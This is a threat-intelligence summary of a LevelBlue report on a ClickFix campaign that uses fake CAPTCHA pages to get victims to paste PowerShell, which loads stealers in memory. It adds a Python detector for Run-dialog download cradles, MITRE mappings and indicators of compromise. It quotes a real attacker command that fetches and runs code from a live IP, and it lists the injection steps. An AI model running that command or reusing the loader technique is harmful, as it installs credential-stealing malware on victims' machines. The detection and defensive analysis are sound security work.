LevelBlue documents a multi-stage, fileless ClickFix campaign that compromises legitimate websites to present fake CAPTCHA prompts which coerce users into executing clipboard-pasted PowerShell commands, enabling in-memory payload delivery via Donut shellcode. The infrastructure is payload-agnostic and rotates multiple commodity stealers and a cryptocurrency clipboard hijacker across numerous C2 servers and fake crypto-exchange sites. #ClickFix #LummaStealer
Keypoints
- Attackers compromised a broad network of legitimate websites to inject malicious JavaScript that loads fake CAPTCHA pages from attacker-controlled domains, redirecting visitors into the ClickFix flow.
- The ClickFix initial-access social engineering instructs users to open the Windows Run dialog (Win+R) and paste an attacker-placed PowerShell command from the clipboard to execute a staged in-memory loader.
- Staged delivery uses PowerShell to download and execute scripts in memory, which then load Donut-generated shellcode (cptch.bin) via VirtualAlloc/Marshal::Copy/CreateThread, leaving minimal disk artifacts.
- The campaign is payload-agnostic and observed rotating at least six distinct final payload families (StealC/Lumma, Lumma Stealer, clipx64 clipboard hijacker, Vidar, Aura, Rhadamanthys) from the same delivery infrastructure.
- Operators leveraged a large cluster of cryptocurrency-themed web templates and >3,000 exchange-like domains (likely from a commercially sold script) to present fake exchange interfaces and harvest credentials alongside malware delivery.
- Defensive recommendations emphasize behavior-based detection: monitor for clipboard-based command execution, suspicious Run-dialog PowerShell invocations, in-memory loaders, and unusual outbound HTTP connections following such activity; user awareness about never pasting/executing Run-dialog commands is critical.
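The following is an added detection example, not code from the LevelBlue report. It scores Sysmon Event ID 1 style process-creation records for the ClickFix pattern described above (an interpreter launched from the Run dialog, a download cradle, in-memory execution, a raw IP or URL) and also screens exported RunMRU registry values, which Windows keeps for commands typed into Win+R. The field names, the assumption that a Run-dialog command is spawned by explorer.exe, the score weights, the alert threshold and all sample records are assumptions constructed for this example; the only string taken from the report is the quoted cradle `powershell -c iex(irm 158.94.209.33 -UseBasicParsing)`.

```python
"""Heuristic detection of ClickFix-style Run-dialog PowerShell launches.

Added example, not the report's code. Input records mimic Sysmon Event ID 1
(ParentImage / Image / CommandLine); all samples below are constructed.
"""
import re
from dataclasses import dataclass, field

# Cmdlets and aliases that pull remote content into memory (download cradle).
DOWNLOAD_RE = re.compile(
    r"\b(?:irm|iwr|Invoke-RestMethod|Invoke-WebRequest|DownloadString|DownloadData)\b",
    re.IGNORECASE,
)
# In-memory execution primitives.
EXEC_RE = re.compile(r"\b(?:iex|Invoke-Expression)\b", re.IGNORECASE)
# A URL or a raw IPv4 literal used as the fetch target.
REMOTE_RE = re.compile(r"(?:https?://\S+|\b(?:\d{1,3}\.){3}\d{1,3}\b)", re.IGNORECASE)
# Switches commonly used to keep the cradle quiet or bypass policy.
QUIET_RE = re.compile(r"-UseBasicParsing|-w(?:indowstyle)?\s+hidden|-nop\b|-ep\s+bypass", re.IGNORECASE)

INTERPRETERS = ("powershell.exe", "pwsh.exe", "powershell_ise.exe", "mshta.exe", "cmd.exe")
# Assumption: a command typed into Win+R is spawned by the shell process, explorer.exe.
RUN_DIALOG_PARENTS = ("explorer.exe",)
ALERT_THRESHOLD = 6  # assumed weight at which an event is raised as an alert


@dataclass
class Verdict:
    score: int
    reasons: list = field(default_factory=list)


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def score_process_event(event: dict) -> Verdict:
    """Weight a single process-creation record; 0 means 'not an interpreter'."""
    image = _basename(event.get("Image", ""))
    if image not in INTERPRETERS:
        return Verdict(0)
    cmd = event.get("CommandLine", "")
    v = Verdict(1, [f"interpreter {image}"])
    if _basename(event.get("ParentImage", "")) in RUN_DIALOG_PARENTS:
        v.score += 2; v.reasons.append("parent explorer.exe (Run dialog / shell)")
    if DOWNLOAD_RE.search(cmd):
        v.score += 2; v.reasons.append("download cradle")
    if EXEC_RE.search(cmd):
        v.score += 2; v.reasons.append("in-memory execution (iex)")
    if REMOTE_RE.search(cmd):
        v.score += 1; v.reasons.append("remote URL or raw IP")
    if QUIET_RE.search(cmd):
        v.score += 1; v.reasons.append("quiet/bypass switch")
    return v


def detect(events: list) -> list:
    """Return (index, Verdict) for every event at or above ALERT_THRESHOLD."""
    out = []
    for i, ev in enumerate(events):
        v = score_process_event(ev)
        if v.score >= ALERT_THRESHOLD:
            out.append((i, v))
    return out


def suspicious_runmru(values: dict) -> list:
    """Screen exported HKCU\\...\\Explorer\\RunMRU values, most recent first.

    Each entry carries a trailing '\\1' suffix; MRUList gives recency order.
    """
    hits = []
    for key in values.get("MRUList", ""):
        raw = values.get(key, "")
        cmd = raw[:-2] if raw.endswith("\\1") else raw
        if DOWNLOAD_RE.search(cmd) and (EXEC_RE.search(cmd) or REMOTE_RE.search(cmd)):
            hits.append(cmd)
    return hits


# Constructed sample telemetry: one ClickFix launch, one benign Run-dialog use,
# one developer shell and one scheduled automation that fetches over HTTPS.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c iex(irm 158.94.209.33 -UseBasicParsing)"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
    {"ParentImage": r"C:\Program Files\Git\usr\bin\bash.exe",
     "Image": r"C:\Program Files\PowerShell\7\pwsh.exe", "CommandLine": "pwsh -File build.ps1"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": "pwsh -NoProfile -Command Invoke-RestMethod https://updates.example.internal/health"},
]
SAMPLE_RUNMRU = {  # constructed export of the RunMRU key
    "MRUList": "cab",
    "a": "cmd\\1",
    "b": "notepad C:\\notes.txt\\1",
    "c": "powershell -c iex(irm 158.94.209.33 -UseBasicParsing)\\1",
}

if __name__ == "__main__":
    for idx, verdict in detect(SAMPLE_EVENTS):
        print(f"ALERT event[{idx}] score={verdict.score}: {', '.join(verdict.reasons)}")
    print("RunMRU hits:", suspicious_runmru(SAMPLE_RUNMRU))
```

The weights are deliberately additive so that a legitimate automation job that calls Invoke-RestMethod over HTTPS from a service host scores well below the threshold, while the Run-dialog cradle accumulates every indicator at once; tune the threshold against your own baseline before deploying it as an alert.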
MITRE Techniques
- [T1204] User Execution – The ClickFix prompt coerces the victim into opening the Run dialog and pasting/executing a PowerShell command. (‘the prompt instructs the victim to open the Windows Run dialog via Win+R, paste a pre-staged command from their clipboard via Ctrl+V, and execute it.’)
- [T1059.001] PowerShell – The pasted command uses PowerShell to fetch a first-stage script and execute it in memory. (‘powershell -c iex(irm 158.94.209.33 -UseBasicParsing)’)
- [T1105] Ingress Tool Transfer – Staged scripts and payload binaries are downloaded from attacker-controlled servers over HTTP. (‘the malicious PowerShell command … retrieve a script from the first-stage server via Invoke-RestMethod and immediately execute it in memory’)
- [T1055] Process Injection – The loader allocates RWX memory in its own PowerShell process (VirtualAlloc), copies the shellcode in (Marshal::Copy), and starts a thread on it (CreateThread), so the payload runs entirely in memory. (‘allocates a region of executable memory using VirtualAlloc with PAGE_EXECUTE_READWRITE permissions, copies the downloaded shellcode into it via Marshal::Copy, and spawns a new thread via CreateThread’)
- [T1027] Obfuscated Files or Information – The final .NET assemblies are encrypted at rest and decrypted at runtime before being loaded in memory. (‘the .NET assembly contained within is encrypted at rest and decrypted at runtime by cptchbuild.bin before being loaded entirely in memory’)
- [T1071.001] Application Layer Protocol: Web Protocols – C2 and payload retrieval occur over HTTP(S) to attacker servers during execution. (‘HTTP traffic showing the malware downloading cptchbuild.bin (186 KB) from the C2 server.’)
- [T1041] Exfiltration Over C2 Channel – Several of the stealers exfiltrate harvested data through web APIs and C2 channels, including the Telegram Bot API. (‘Direct references to Telegram Bot API methods SendDocument and SendMessage confirm the exfiltration channel.’)
- [T1497] Virtualization/Sandbox Evasion (anti-analysis) – The injected JavaScript detects open browser Developer Tools and deliberately freezes the page with repeated debugger statements and an infinite loop to hinder analysis. (‘it detects when browser Developer Tools are opened and intentionally freezes the page by triggering repeated debugger statements and an infinite loop’)
Indicators of Compromise
- [IP Address] Stage servers and C2 – 158.94.209.33 (stage-1 dropper), 94.154.35.115 (payload/C2), and further IPs including 178.16.53.70 and 107.150.0.79.
- [Domains] Fake CAPTCHA and redirect domains serving the clipboard-hijack scripts – cptoptious[.]com, captoolsz[.]com, capztoolz[.]com, captioto[.]com, namzcp[.]org, vision-clouds[.]org (plus multiple additional domains).
- [C2 / Exchange-related Domains] Domains observed as malware C2 or as fake exchange fronts – alipico[.]com, sodstreams[.]com, yago[.]fun, agfoodpos[.]com, mushub[.]cfd, searchservice[.]cfd.
- [File Names] In-memory loaders and payloads observed – cptch.bin, cptchbuild.bin, cs.bin (Lumma/StealC), clipx64.bin (clipboard hijacker), myscript.exe and ayaqeecl.dll (Rhadamanthys dropper components).
- [Script Paths / URLs] Injection point and C2 paths – goveanrs[.]org/jsrepo (injected script) and C2 gate paths such as /gate2hj45g2kway/lpr307k4[.]ka879 referenced by Rhadamanthys.
- [Hashes] The report has a payload-hash section, but no specific file hashes appear in the article excerpt available here.